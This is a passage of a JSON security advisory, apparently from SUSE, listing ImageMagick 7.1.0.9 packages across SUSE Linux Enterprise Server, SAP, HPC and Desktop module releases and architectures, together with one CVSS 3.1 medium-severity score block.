"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
